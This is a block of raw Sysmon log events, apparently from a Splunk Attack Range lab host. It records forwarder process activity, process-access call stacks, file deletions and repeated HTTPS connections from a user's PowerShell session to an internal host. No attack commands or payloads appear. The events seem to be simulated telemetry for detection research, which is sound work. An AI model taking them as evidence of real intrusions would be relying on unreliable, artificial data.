18:14:49.564{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56692-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:26.591{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=887127599D54D429420775CD7B265492,SHA256=BEE90F45F7446C5602D1207C9E32CFEC06301E3EB453BCA5B4CBA741DE0CECE4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:27.605{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D09F91B2E777A31AF482F465F30ADD6,SHA256=AC28DAA6BBEAB580A98609BB0038DEA52ED252A63FDA250B70716B8ED7D00CE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.970{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F04-613A-5490-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.968{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.968{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.968{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.968{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F04-613A-5490-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.968{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.967{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F04-613A-5490-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.951{B81B27B7-4F04-613A-5490-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.770{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BD0CA15F38897211AC72C11E8BB39395,SHA256=A54C43178D4512C577AFD9D6BCF76D8338556513E65B44A2AC7475D7DCB96829,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.620{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FA1AC7BBBABC40A837977B34FFA86D6,SHA256=237FC739E2A456AAFD274A21429633BEFDB598439611FA7413E39EFD706031E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:53.175{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56693-false10.0.1.12-8000- 10341000x800000000000000035085072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.270{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F04-613A-5390-03000000C801}648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.268{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.268{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.268{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.268{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.268{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F04-613A-5390-03000000C801}648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.267{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F04-613A-5390-03000000C801}648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.252{B81B27B7-4F04-613A-5390-03000000C801}648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035085088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:53.575{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56694-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:29.634{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D29BE9204BAB1A511C5218C3477CF88C,SHA256=DC6C71F844EF34E1D96ADEC3B519B468BF7325F957B12C85498F7B6A8BFD7737,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:29.272{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C90FE35C7C492EA6BB430D8FA8BF4D30,SHA256=72376994D9E51EA2B6CF0D4C7A44C91B13C272C803A621A7459161B32AC98944,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:29.272{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF780A266475B26DF45F1F93A4F49B0B,SHA256=1DF7CC580AEEABAF877163613D421FA80FCF30A6F6F54F30CA0EA2919B324FC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:29.119{B81B27B7-4F04-613A-5490-03000000C801}65322812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:30.666{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C08145419FEE5A0412F5FA33183B123,SHA256=A5A61D1C99C584131C99E033DCDA26B1D993A0D1893B2C230024932FFA9BEBA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:31.718{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=079F5F891F63B9A19ABB25E2B0D46C76,SHA256=AA879F331879335B6BF24D229830283A9EEB7009E2C689F7A9187D284F40C0E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:32.732{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12CCCF4A12067417DCEE77C23EC4DBAF,SHA256=BE61FA0AF5CECDCE86C31443C04F95EAB7FD85AF4678BD674E4B822470597F92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:32.569{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=114148097D503F29CD3361914663A85E,SHA256=FA16905828326864A137E13CFED901E806C65229E27AE111FA777908D4FEFAC9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:57.587{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56695-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:33.765{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16A204207E8BEB5C18CB4341591982F1,SHA256=B43067DAF44FFF27E7C1A5EE6535AC314A3B5806A450CD2F500D1350E33AC4D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:34.815{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6A350B4471D9A9B29C8DA45548E6270,SHA256=CEBA3B6D46B8D5E8B1C0A6867E6EF2CDC43F08C9218F91C9624372FFE6BC4EF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:59.085{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56696-false10.0.1.12-8000- 23542300x800000000000000035085097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:35.835{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5223B2B4F4000A96C724E9AEF4919D9,SHA256=42B25C519552D6C0868D2A77DA68580E8DFABB6A1F24312FE53EF8A4F69B54E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:36.849{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24954454F49A4AC7ADC5D97CF1D0F405,SHA256=14A774DB36A380E0728162ABBBD463F957203EA448D0389FB161DC37C0B97DC6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:36.787{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0340F02F5F6E55DD6A93745333D64821,SHA256=4B26BABEF2FFC5C254DE34EA38EBD221F210E2D021874C5FD9C26B8E5EAC8E7F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:36.419{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=680DA3F006AA8D4315343D6C814D609D,SHA256=E38339212FA434424CFC7BBDDB3CE3774B5189701D833D74667C8B379ED9CD27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 